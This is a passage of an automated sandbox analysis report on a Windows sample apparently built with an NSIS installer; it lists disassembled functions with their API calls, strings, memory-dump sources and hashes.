String ID: C:\$C:\Users\user\AppData\Local\Temp\
API String ID: 3248276644-1964270705
Opcode ID: 7c21406a6ebf8fc224ae0ccc6b020e70a1639b7280e68367676f2d78d50147cb
Instruction ID: 0bce86d1d95a7c790b53086ee47358a3377499fb664fcb231eb74dc800c81f90
Opcode Fuzzy Hash: 7c21406a6ebf8fc224ae0ccc6b020e70a1639b7280e68367676f2d78d50147cb
Instruction Fuzzy Hash: 7AF0F43A105E1269D622733A5C09AAF1555CE86360B5A457BFC91B22C6CF3C8A42CCBE

Uniqueness

Uniqueness Score: -1.00%

Function 00406076 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 37
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTickCount.KERNEL32 ref: 00406094
GetTempFileNameW.KERNEL32(?,?,00000000,?,?,?,00000000,00403530,1033,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040381C), ref: 004060AF

Strings

nsa, xrefs: 00406083
C:\Users\user\AppData\Local\Temp\, xrefs: 0040607B

Memory Dump Source

Source File: 00000000.00000002.2294059283.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2294014487.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2294093480.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2294121455.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2294121455.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2294121455.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2294121455.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2294121455.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2294121455.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2294121455.0000000000441000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2294338499.0000000000445000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: CountFileNameTempTick
String ID: C:\Users\user\AppData\Local\Temp\$nsa
API String ID: 1716503409-44229769
Opcode ID: 017de5c5da22b1c6cf72d7a8a287ef2c48f88e3ac937424cf3c6df762bd8e462
Instruction ID: 86e06e500a6970b3bc5bd370241205c1b86a0a172d82c816bfbfc8c597d973d5
Opcode Fuzzy Hash: 017de5c5da22b1c6cf72d7a8a287ef2c48f88e3ac937424cf3c6df762bd8e462
Instruction Fuzzy Hash: 65F09076B50204FBEB10CF69ED05F9EB7ACEB95750F11803AED05F7240E6B099548768

Uniqueness

Uniqueness Score: -1.00%

Function 004020DD Relevance: 4.6, APIs: 3, Instructions: 73
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNEL32(00000000,00000001,000000F0), ref: 00402108

Part of subcall function 004055DC: lstrlenW.KERNEL32(0042BA48,00000000,00428E20,759223A0,?,?,?,?,?,?,?,?,?,0040341D,00000000,?), ref: 00405614
Part of subcall function 004055DC: lstrlenW.KERNEL32(0040341D,0042BA48,00000000,00428E20,759223A0,?,?,?,?,?,?,?,?,?,0040341D,00000000), ref: 00405624
Part of subcall function 004055DC: lstrcatW.KERNEL32(0042BA48,0040341D), ref: 00405637
Part of subcall function 004055DC: SetWindowTextW.USER32(0042BA48,0042BA48), ref: 00405649
Part of subcall function 004055DC: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040566F
Part of subcall function 004055DC: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405689
Part of subcall function 004055DC: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405697

LoadLibraryExW.KERNEL32(00000000,?,00000008,00000001,000000F0), ref: 00402119
FreeLibrary.KERNEL32(?,?,000000F7,?,?,00000008,00000001,000000F0), ref: 00402196

Memory Dump Source

Source File: 00000000.00000002.2294059283.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2294014487.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2294093480.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2294121455.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2294121455.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2294121455.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2294121455.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2294121455.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2294121455.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2294121455.0000000000441000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2294338499.0000000000445000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: MessageSend$Librarylstrlen$FreeHandleLoadModuleTextWindowlstrcat
String ID:
API String ID: 334405425-0
Opcode ID: 675ba370df0aff6a88f198f51fec383e6e490030c952a3077ac8e14d7d31a15f
Instruction ID: 3664ba2fa099400b069473e4dbd5787d756d46fb785c5e03f539e90392346bbf
Opcode Fuzzy Hash: 675ba370df0aff6a88f198f51fec383e6e490030c952a3077ac8e14d7d31a15f
Instruction Fuzzy Hash: C9219231904108BADF11AFA5CF49A9D7A71FF84358F20413FF201B91E1CBBD8982AA5D

Uniqueness

Uniqueness Score: -1.00%

Function 00405C1B Relevance: 4.5, APIs: 3, Instructions: 28
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00406022: GetFileAttributesW.KERNEL32(?,?,00405C27,?,?,00000000,00405DFD,?,?,?,?), ref: 00406027
Part of subcall function 00406022: SetFileAttributesW.KERNEL32(?,00000000), ref: 0040603B

RemoveDirectoryW.KERNEL32(?,?,?,00000000,00405DFD), ref: 00405C36
DeleteFileW.KERNEL32(?,?,?,00000000,00405DFD), ref: 00405C3E
SetFileAttributesW.KERNEL32(?,00000000), ref: 00405C56

Memory Dump Source

Source File: 00000000.00000002.2294059283.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2294014487.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2294093480.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2294121455.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2294121455.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2294121455.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2294121455.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2294121455.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2294121455.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2294121455.0000000000441000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2294338499.0000000000445000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: File$Attributes$DeleteDirectoryRemove
String ID:
API String ID: 1655745494-0
Opcode ID: db7f6541ced3958ca03b9484ad33d053af3f68eb31512009fba6ce163230055c
Instruction ID: 2cd832b5149a82f614695d38d41b3aba95dfe4f26efc6ce9164d7e3db346642e
Opcode Fuzzy Hash: db7f6541ced3958ca03b9484ad33d053af3f68eb31512009fba6ce163230055c
Instruction Fuzzy Hash: 9AE02B3110D7915AE32077705E0CB5F2AD8DF86324F05093AF492F10C0DB78488A8A7E

Uniqueness

Uniqueness Score: -1.00%

Function 004069F6 Relevance: 4.5, APIs: 3, Instructions: 27
synchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WaitForSingleObject.KERNEL32(?,00000064), ref: 00406A07
WaitForSingleObject.KERNEL32(?,00000064,0000000F), ref: 00406A1C
GetExitCodeProcess.KERNEL32(?,?), ref: 00406A29

Memory Dump Source

Source File: 00000000.00000002.2294059283.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2294014487.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2294093480.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2294121455.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2294121455.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2294121455.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2294121455.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2294121455.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2294121455.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2294121455.0000000000441000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2294338499.0000000000445000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: ObjectSingleWait$CodeExitProcess
String ID:
API String ID: 2567322000-0
Opcode ID: 17a38a5c847dd8245057c7588e6ed0bb749bee8eb0eab1a955a98d2ec77b2a61
Instruction ID: 7df20da1addfcb38db7f968568525e0055db05351d7e2d981a5b9d81d63ff89b
Opcode Fuzzy Hash: 17a38a5c847dd8245057c7588e6ed0bb749bee8eb0eab1a955a98d2ec77b2a61
Instruction Fuzzy Hash: 6BE09271600208BBDB00AB54DD01D9E7B6EDB85700F104032BA45BA190C6B19E62DEA4

Uniqueness

Uniqueness Score: -1.00%

Function 004015C6 Relevance: 3.1, APIs: 2, Instructions: 65
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00405ED1: CharNextW.USER32(?,?,C:\,?,00405F45,C:\,C:\,75923420,?,C:\Users\user\AppData\Local\Temp\,00405C83,?,75923420,C:\Users\user\AppData\Local\Temp\,0043F000), ref: 00405EDF
Part of subcall function 00405ED1: CharNextW.USER32(00000000), ref: 00405EE4
Part of subcall function 00405ED1: CharNextW.USER32(00000000), ref: 00405EFC

GetFileAttributesW.KERNEL32(?,?,00000000,0000005C,00000000,000000F0), ref: 0040161F

Part of subcall function 00405AAB: CreateDirectoryW.KERNEL32(00437800,?), ref: 00405AED

SetCurrentDirectoryW.KERNEL32(?,00440000,?,00000000,000000F0), ref: 00401652

Memory Dump Source

Source File: 00000000.00000002.2294059283.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2294014487.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2294093480.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2294121455.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2294121455.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2294121455.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2294121455.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2294121455.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2294121455.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2294121455.0000000000441000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2294338499.0000000000445000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: CharNext$Directory$AttributesCreateCurrentFile
String ID:
API String ID: 1892508949-0
Opcode ID: 6eb1be088149721894534dc5ef05b39002eda9ec2efe8824e8f1ae211de42d0c
Instruction ID: 6fd3d265dcb44280b24f8e6f21651466162e19908bb00ba525d5af3adea1cd3c
Opcode Fuzzy Hash: 6eb1be088149721894534dc5ef05b39002eda9ec2efe8824e8f1ae211de42d0c
Instruction Fuzzy Hash: F211E231404104ABCF206FA5CD0159F36B0EF04368B25493FE945B22F1DA3D4A81DA5E

Uniqueness

Uniqueness Score: -1.00%

Function 00401389 Relevance: 3.0, APIs: 2, Instructions: 43
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
SendMessageW.USER32(0040A2D8,00000402,00000000), ref: 004013F4

Memory Dump Source

Source File: 00000000.00000002.2294059283.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2294014487.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2294093480.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2294121455.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2294121455.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2294121455.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2294121455.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2294121455.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2294121455.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2294121455.0000000000441000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2294338499.0000000000445000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: a48e27458ca857e7bf1c95edfaa4f4fc3f64b4f364872359a8149092e2b898a4
Instruction ID: 0adee223d2b7ba7d815a442a2885e1f2b60e3b86eb1a18037e9b6c54a102055c
Opcode Fuzzy Hash: a48e27458ca857e7bf1c95edfaa4f4fc3f64b4f364872359a8149092e2b898a4
Instruction Fuzzy Hash: 0E01FF31620220AFE7195B389E05B6B3698E710329F10863FF851F62F1EA78DC429B4C

Uniqueness

Uniqueness Score: -1.00%

Function 00405AAB Relevance: 3.0, APIs: 2, Instructions: 26COMMON

Download Yara Rule

APIs

CreateDirectoryW.KERNEL32(00437800,?), ref: 00405AED
GetLastError.KERNEL32 ref: 00405AFB

Memory Dump Source

Source File: 00000000.00000002.2294059283.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2294014487.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2294093480.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2294121455.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2294121455.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2294121455.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2294121455.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2294121455.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2294121455.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2294121455.0000000000441000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2294338499.0000000000445000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: CreateDirectoryErrorLast
String ID:
API String ID: 1375471231-0
Opcode ID: 93d1f65b513afb97053b6d969de6af344d99c991354c8e43ed6bd2c6eb9068ab
Instruction ID: ed7a645988c2e2a06802fdc928ba12763e2e88a5fcf473fdfb2f1107ef0c66eb
Opcode Fuzzy Hash: 93d1f65b513afb97053b6d969de6af344d99c991354c8e43ed6bd2c6eb9068ab
Instruction Fuzzy Hash: 56F0F970D0060DDBDB00CFA4C5497DFBBB4AB04305F00812AD545B6281D7B95248CBA9

Uniqueness

Uniqueness Score: -1.00%

Function 00405B3A Relevance: 3.0, APIs: 2, Instructions: 24processCOMMON

Download Yara Rule

APIs

CreateProcessW.KERNEL32(00000000,00437800,00000000,00000000,00000000,04000000,00000000,00000000,0042FA70,?,?,?,00437800,?), ref: 00405B63
CloseHandle.KERNEL32(?,?,?,00437800,?), ref: 00405B70

Memory Dump Source

Source File: 00000000.00000002.2294059283.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2294014487.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2294093480.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2294121455.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2294121455.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2294121455.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2294121455.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2294121455.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2294121455.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2294121455.0000000000441000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2294338499.0000000000445000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: CloseCreateHandleProcess
String ID:
API String ID: 3712363035-0
Opcode ID: 6fd2602221babf1a8a9a6246b82f99e4ae13039f11edd6951af80fecf8f79ee2
Instruction ID: b1032d8704f3223f2a9afbe03a7757fefc60a77e8ecf1711bb84520e71ece662
Opcode Fuzzy Hash: 6fd2602221babf1a8a9a6246b82f99e4ae13039f11edd6951af80fecf8f79ee2
Instruction Fuzzy Hash: 91E09AB4600219BFEB109B74AD06F7B767CE704604F408475BD15E2151D774A8158A78

Uniqueness

Uniqueness Score: -1.00%

Function 0040694B Relevance: 3.0, APIs: 2, Instructions: 22libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(?,00000020,?,00403642,0000000C,?,?,?,?,?,?,?,?), ref: 0040695D
GetProcAddress.KERNEL32(00000000,?), ref: 00406978

Part of subcall function 004068DB: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004068F2
Part of subcall function 004068DB: wsprintfW.USER32 ref: 0040692D
Part of subcall function 004068DB: LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 00406941

Memory Dump Source

Source File: 00000000.00000002.2294059283.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2294014487.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2294093480.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2294121455.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2294121455.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2294121455.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2294121455.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2294121455.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2294121455.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2294121455.0000000000441000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2294338499.0000000000445000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
String ID:
API String ID: 2547128583-0
Opcode ID: fa9529b661a20328ef717d54741181462d2da8a99b8882de0ad3477ad76f042b
Instruction ID: ff64ee7455e026c1647d72c339307a336527f79dacb59e64982fca04d7429b22
Opcode Fuzzy Hash: fa9529b661a20328ef717d54741181462d2da8a99b8882de0ad3477ad76f042b
Instruction Fuzzy Hash: 38E08673504210AFD61057705D04D27B3A89F85740302443EF946F2140DB34DC32ABA9

Uniqueness

Uniqueness Score: -1.00%

Function 00406047 Relevance: 3.0, APIs: 2, Instructions: 16fileCOMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNEL32(00000003,004030C2,C:\Users\user\Desktop\file.exe,80000000,00000003), ref: 0040604B
CreateFileW.KERNEL32(?,?,00000001,00000000,?,00000001,00000000), ref: 0040606D

Memory Dump Source

Source File: 00000000.00000002.2294059283.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2294014487.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2294093480.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2294121455.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2294121455.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2294121455.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2294121455.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2294121455.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2294121455.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2294121455.0000000000441000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2294338499.0000000000445000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: File$AttributesCreate
String ID:
API String ID: 415043291-0
Opcode ID: 6be4d53c09d0ea7202590e2ef391dde9d68f005235e9a58d36352f422cb06a2c
Instruction ID: 9d50a09f5748d4f60ef03139cc16a9656d1073ae209d3065c053d14625e31d4c
Opcode Fuzzy Hash: 6be4d53c09d0ea7202590e2ef391dde9d68f005235e9a58d36352f422cb06a2c
Instruction Fuzzy Hash: 87D09E31654301AFEF098F20DE16F2EBAA2EB84B00F11552CB682941E0DA715819DB15

Uniqueness

Uniqueness Score: -1.00%

Function 00406022 Relevance: 3.0, APIs: 2, Instructions: 13COMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNEL32(?,?,00405C27,?,?,00000000,00405DFD,?,?,?,?), ref: 00406027
SetFileAttributesW.KERNEL32(?,00000000), ref: 0040603B

Memory Dump Source

Source File: 00000000.00000002.2294059283.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2294014487.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2294093480.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2294121455.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2294121455.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2294121455.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2294121455.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2294121455.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2294121455.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2294121455.0000000000441000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2294338499.0000000000445000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: bc30e5c928ed30f9cb3e730bb3a024ff28878b527ec9bdb2640fa07c227b463d
Instruction ID: 97cbb32404f08d1f6fed837f871d2b37f55cf766f9720be9b575451f5cdabe77
Opcode Fuzzy Hash: bc30e5c928ed30f9cb3e730bb3a024ff28878b527ec9bdb2640fa07c227b463d
Instruction Fuzzy Hash: A3D0C972504220AFC2102728AE0889BBB55EB542717028A35FCA9A22B0CB304CA68694

Uniqueness

Uniqueness Score: -1.00%

Function 00403B4F Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 11COMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32(FFFFFFFF,00403A82,?,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403B5A

Strings

C:\Users\user\AppData\Local\Temp\nsvE79C.tmp\, xrefs: 00403B6E

Memory Dump Source

Source File: 00000000.00000002.2294059283.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2294014487.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2294093480.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2294121455.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2294121455.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2294121455.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2294121455.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2294121455.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2294121455.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2294121455.0000000000441000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2294338499.0000000000445000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: CloseHandle
String ID: C:\Users\user\AppData\Local\Temp\nsvE79C.tmp\
API String ID: 2962429428-3671176828
Opcode ID: ae973bb0dca4e4815b90d97470301ae31a1ae4600fd43aa67c366af3984d4a62
Instruction ID: 69482a2579ef2b85c2ad9764c5c762c9eb4f19b2fcf4b87e51b14fafea8afdc0
Opcode Fuzzy Hash: ae973bb0dca4e4815b90d97470301ae31a1ae4600fd43aa67c366af3984d4a62
Instruction Fuzzy Hash: EDC0123090470496F1206F79AE8FA153A64574073DBA48726B0B8B10F3CB7C5659555D

Uniqueness

Uniqueness Score: -1.00%

Function 00405B05 Relevance: 3.0, APIs: 2, Instructions: 9COMMON

Download Yara Rule

APIs

CreateDirectoryW.KERNEL32(?,00000000,00403525,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040381C,?,00000008,0000000A,0000000C), ref: 00405B0B
GetLastError.KERNEL32(?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00405B19

Memory Dump Source

Source File: 00000000.00000002.2294059283.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2294014487.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2294093480.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2294121455.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2294121455.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2294121455.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2294121455.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2294121455.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2294121455.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2294121455.0000000000441000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2294338499.0000000000445000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: CreateDirectoryErrorLast
